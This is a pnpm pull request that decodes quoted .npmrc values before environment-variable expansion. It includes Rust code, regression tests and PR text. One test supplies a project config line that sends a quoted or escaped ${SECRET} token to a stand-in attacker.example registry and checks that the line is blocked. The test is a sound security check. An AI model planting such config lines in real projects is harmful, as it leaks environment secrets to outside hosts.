### PR TITLE
fix(config): unwrap quoted config values

### DIFF
--- a/.changeset/quoted-auth-tokens.md
+++ b/.changeset/quoted-auth-tokens.md
@@ -1,0 +1,5 @@
+---
+"pacquet": patch
+---
+
+Fixed pnpm retaining the surrounding quotes in `.npmrc` values, including auth tokens expanded from environment variables. This restores authentication with registries configured using `:_authToken="${TOKEN}"` [pnpm/pnpm#14427](https://github.com/pnpm/pnpm/issues/14427).

--- a/pnpm/crates/config/src/npmrc_auth.rs
+++ b/pnpm/crates/config/src/npmrc_auth.rs
@@ -6,6 +6,7 @@ use pnpm_network::{
     base64_encode, base64_encode_bytes, nerf_dart,
 };
 use std::{
+    borrow::Cow,
     collections::{BTreeMap, BTreeSet, HashMap},
     path::{Path, PathBuf},
     sync::Arc,
@@ -331,7 +332,7 @@ impl NpmrcAuth {
                 continue;
             };
             let raw_key = raw_key.trim();
-            let raw_value = raw_value.trim();
+            let raw_value = decode_ini_value(raw_value.trim());
 
             // Apply ${VAR} substitution to both the key and the value.
             // Unresolved placeholders become "" and are recorded as warnings.
@@ -365,20 +366,20 @@ impl NpmrcAuth {
                 continue;
             }
             if !opts.expand_request_destination_env
-                && has_env_placeholder(raw_value)
+                && has_env_placeholder(&raw_value)
                 && is_request_destination_value_key(&key)
             {
                 auth.warn_ignored_request_destination_env(&key);
                 continue;
             }
             if !opts.expand_auth_value_env
-                && has_env_placeholder(raw_value)
+                && has_env_placeholder(&raw_value)
                 && is_auth_value_key(&key)
             {
                 auth.warn_ignored_auth_value_env(&key);
                 continue;
             }
-            let (value, value_unresolved) = env_replace_lossy::<Sys>(raw_value);
+            let (value, value_unresolved) = env_replace_lossy::<Sys>(&raw_value);
             for placeholder in key_unresolved.into_iter().chain(value_unresolved) {
                 auth.warnings.push(format!("Failed to replace env in config: {placeholder}"));
             }
@@ -863,6 +864,18 @@ impl NpmrcAuth {
             .or_default()
             .entry(scope.unwrap_or_else(|| DEFAULT_REGISTRY_SCOPE.to_owned()))
             .or_default()
+    }
+}
+
+fn decode_ini_value(value: &str) -> Cow<'_, str> {
+    if value.starts_with('\'') && value.ends_with('\'') {
+        Cow::Borrowed(
+            value.strip_prefix('\'').and_then(|value| value.strip_suffix('\'')).unwrap_or(""),
+        )
+    } else if value.len() >= 2 && value.starts_with('"') && value.ends_with('"') {
+        serde_json::from_str::<String>(value).map_or(Cow::Borrowed(value), Cow::Owned)
+    } else {
+        Cow::Borrowed(value)
     }
 }
 

--- a/pnpm/crates/config/src/npmrc_auth/tests.rs
+++ b/pnpm/crates/config/src/npmrc_auth/tests.rs
@@ -256,6 +256,56 @@ fn env_replace_substitutes_token() {
 }
 
 #[test]
+fn env_replace_substitutes_quoted_token_without_quotes() {
+    static_env!(EnvWithToken, &[("TOKEN", "abc123")]);
+
+    for quoted in [r#""${TOKEN}""#, "'${TOKEN}'", r#""\u0024{TOKEN}""#] {
+        let ini = format!("//reg.com/:_authToken={quoted}\n");
+        let auth = NpmrcAuth::from_ini::<EnvWithToken>(&ini, Path::new(""));
+        assert_eq!(default_auth_token(&auth, "//reg.com/"), Some(Some("abc123")));
+    }
+}
+
+#[test]
+fn parses_ini_quoted_values() {
+    for (quoted, expected) in [
+        (r#""literal-token""#, "literal-token"),
+        ("'literal-token'", "literal-token"),
+        (r#""token\nline""#, "token\nline"),
+        ("'", ""),
+        (r#""unterminated"#, r#""unterminated"#),
+        ("'unterminated", "'unterminated"),
+    ] {
+        let ini = format!("//reg.com/:_authToken={quoted}\n");
+        let auth = NpmrcAuth::from_ini::<NoEnv>(&ini, Path::new(""));
+        assert_eq!(default_auth_token(&auth, "//reg.com/"), Some(Some(expected)));
+    }
+}
+
+#[test]
+fn project_ini_ignores_quoted_auth_env_placeholders() {
+    static_env!(EnvWithSecret, &[("SECRET", "leaked")]);
+
+    for quoted in [r#""${SECRET}""#, r#""\u0024{SECRET}""#] {
+        let ini = format!("//attacker.example/:_authToken={quoted}\n");
+        let auth = NpmrcAuth::from_project_ini::<EnvWithSecret>(&ini, Path::new(""));
+
+        assert!(
+            auth.creds_by_scope_by_uri.is_empty(),
+            "unexpected credentials: {:?}",
+            auth.creds_by_scope_by_uri,
+        );
+        assert!(
+            auth.warnings
+                .iter()
+                .any(|warning| warning.contains("Ignored project-level auth setting")),
+            "warnings: {:?}",
+            auth.warnings,
+        );
+    }
+}
+
+#[test]
 fn project_ini_ignores_env_placeholders_in_registry_urls() {
     static_env!(EnvWithSecret, &[("SECRET", "leaked")]);
 


### PR DESCRIPTION
<!-- A maintainer will only start reviewing once CodeRabbit has approved and
CI is green. Please wait for those to pass before expecting human review. -->

## Summary

<!-- Describe what this PR changes and why, for reviewers. Link any related
issues here (Closes pnpm/pnpm#123, Fixes pnpm/pnpm#456, or Related to
pnpm/pnpm#123 for a partial fix). -->

- Decode matching single- and double-quoted `.npmrc` values before environment-variable expansion in the Rust CLI.
- Preserve the project-level auth secret guard after decoding, including when a double-quoted JSON escape produces the placeholder.
- Add regression and edge-case tests plus a patch changeset for `pacquet`.

The TypeScript CLI already strips matching quotes through `read-ini-file` and `ini`, so no TypeScript code change is needed.

Closes pnpm/pnpm#14427.

## Squash Commit Body

<!-- This PR will be squash-merged, using the PR title as the commit subject.
Provide the body of that commit below.

This body is for developers reading the git history, so be as detailed as the
change warrants: explain the rationale, design decisions, and trade-offs. The
user-facing release note belongs in the changeset, not here. -->

```text
Decode matching single- and double-quoted `.npmrc` values before environment-variable expansion in the Rust config parser. This matches the TypeScript parser while ensuring the project-level auth secret guard evaluates the decoded value, including JSON-escaped placeholders.

Closes pnpm/pnpm#14427.
```

## Checklist

<!-- Mark items with [x] once done. Remove items that don't apply. -->

- [x] I checked the referenced issue and verified that none of the PRs
  already linked to it solves it.
- [x] The change is implemented in both the TypeScript CLI and the Rust
  `pnpm/` port, or the description notes what still needs porting.
- [x] Added a changeset (`pnpm changeset`) if this PR changes any published
  package. Keep it short and written for pnpm users — it becomes a release note.
- [x] Added or updated tests.

---
Written by an agent (Codex, gpt-5.6-sol).

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/pnpm/codesmith/pnpm/pr/14438"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1790898344&installation_model_id=426870&pr_number=14438&repository=pnpm%2Fpnpm&return_to=https%3A%2F%2Fgithub.com%2Fpnpm%2Fpnpm%2Fpull%2F14438&signature=dd26c5276a7ea841cb0f4069efc371302e1dae1bd5bf96cf5c687c18a46c5c8c"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>@codesmith-bot</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **Bug Fixes**
  - Fixed authentication tokens in `.npmrc` files when values are surrounded by single or double quotes.
  - Environment-expanded tokens now correctly preserve supported quoting and escape sequences.
  - Quoted authentication settings in untrusted project configuration remain blocked and generate warnings.

- **Tests**
  - Added coverage for quoted tokens, environment substitution, escaped placeholders, and security protections.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->